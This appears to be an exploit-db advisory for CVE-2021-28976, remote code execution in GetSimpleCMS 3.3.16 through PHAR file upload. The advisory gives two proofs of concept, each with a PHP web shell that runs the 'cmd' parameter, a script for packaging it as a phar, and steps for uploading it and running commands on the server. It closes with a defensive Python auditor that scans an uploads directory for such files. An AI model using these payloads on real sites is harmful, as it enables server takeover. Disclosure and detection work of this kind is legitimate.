GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

Published: 11 Apr 2025 00:00:00
Reported by: CodeSecLab
Type: exploitdb
Source: www.exploit-db.com

GetSimpleCMS 3.3.16 allows Remote Code Execution via PHAR file upload in admin/upload.php.

Related:
Reporter | Title | Published
Circl | CVE-2021-28976 | 12 Apr 2025 21:02
CNNVD | getsimplecms code issue vulnerability | 23 Jun 2021 00:00
CNVD | GetSimple CMS Remote Code Execution Vulnerability (CNVD-2021-45301) | 24 Jun 2021 00:00
CVE | CVE-2021-28976 | 23 Jun 2021 12:36
Cvelist | CVE-2021-28976 | 23 Jun 2021 12:36
EUVD | EUVD-2021-15623 | 7 Oct 2025 00:30
NVD | CVE-2021-28976 | 23 Jun 2021 13:15
OpenVAS | GetSimple CMS < 3.3.16 Multiple Vulnerabilities | 9 Jul 2019 00:00
Packet Storm | GetSimpleCMS Shell Upload | 11 Apr 2025 00:00
Packet Storm | GetSimple CMS 3.3.16 Cross Site Request Forgery | 15 Dec 2025 00:00

# Exploit Title: GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/GetSimpleCMS/GetSimpleCMS
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS
# Version: 3.3.16
# Tested on: Ubuntu Windows
# CVE : CVE-2021-28976

PoC-1:
1) Create a .phar file.
1. Create the PHP script: Save the following code in a file, say index.php:
<?php echo shell_exec($_GET['cmd']); ?>
2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows:
<?php
try {
    // Initialize a new Phar object, name it "archive.phar"
    $phar = new Phar('archive.phar');

    // Set the stub (entry point) for the Phar file, pointing to index.php
    $phar->startBuffering();
    $phar->addFromString('index.php', file_get_contents('index.php'));
    $phar->setStub($phar->createDefaultStub('index.php'));
    $phar->stopBuffering();

    echo "Phar archive created successfully!";
} catch (Exception $e) {
    echo "Error: " . $e->getMessage();
}
3. Run the script to generate the .phar file: In a terminal on a system that has PHP installed, run: php create_phar.php
After running the script, you should find a file named archive.phar in your working directory.

2) Upload file:
1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php.
2. You can find the file at http://getsimplecms/data/uploads/.

3) Details:
{
    "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.",
    "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.",
    "Request URL": "http://getsimplecms/admin/upload.php",
    "Request Method": "POST",
    "Request Parameters": {
        "file": "<Malicious File>"
    }
}


PoC-2:
1) LLM creates the file exploit.phar with the following contents:
malicious.php                                                                                       0000644 0000000 0000000 00000000036 00000000000 010442  0                                                                                                    ustar 00                                                                                                                                                                                                                                                       <?php system($_GET['cmd']); ?>                  

2)
1. Prepare a PHP file named 'exploit.phar'.
2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.
3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id).

[Replace Your Domain Name]
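
For defenders checking whether an installation has already been abused this way, the following added example (not part of the original advisory and not GetSimpleCMS code) audits an uploads directory such as data/uploads for both PoC variants, flagging files by extension and by content. The extension set, function names and sample files are assumptions constructed for illustration.

```python
import os
import tempfile

# Extensions commonly mapped to the PHP handler (assumption: adjust to the
# handler rules of the web server being audited).
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".pht", ".phar"}
# Content markers: a PHP open tag, and the terminator of a native phar stub.
CONTENT_MARKERS = (b"<?php", b"__HALT_COMPILER();")


def audit_uploads(root, max_bytes=1 << 20):
    """Return sorted (relative_path, reasons) for suspicious files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            reasons = ["extension " + ext] if ext in PHP_EXTENSIONS else []
            with open(path, "rb") as fh:
                head = fh.read(max_bytes)  # only the first 1 MiB is inspected
            for marker in CONTENT_MARKERS:
                if marker in head:
                    reasons.append("contains " + marker.decode())
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)


def demo():
    """Build a constructed uploads tree (harmless placeholders) and audit it."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
            "notes.txt": b"meeting notes",
            # tar-style layout as in PoC-2: member header, then PHP source
            "exploit.phar": b"malicious.php".ljust(512, b"\x00") + b"<?php /* placeholder */ ?>",
            # harmless-looking extension, PHP archive stub inside
            "backup.jpg": b"<?php __HALT_COMPILER(); ?>",
        }
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return audit_uploads(root)


if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, "->", "; ".join(reasons))
```

A content hit on a file with a non-PHP extension is only exploitable if the server hands that extension to PHP, but it is still worth triaging as evidence of an upload attempt.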

11 Apr 2025 00:00 (Current)
Vulners AI Score: 7 (High risk)
CVSS 2: 6.5
CVSS 3.1: 7.2
EPSS: 0.07548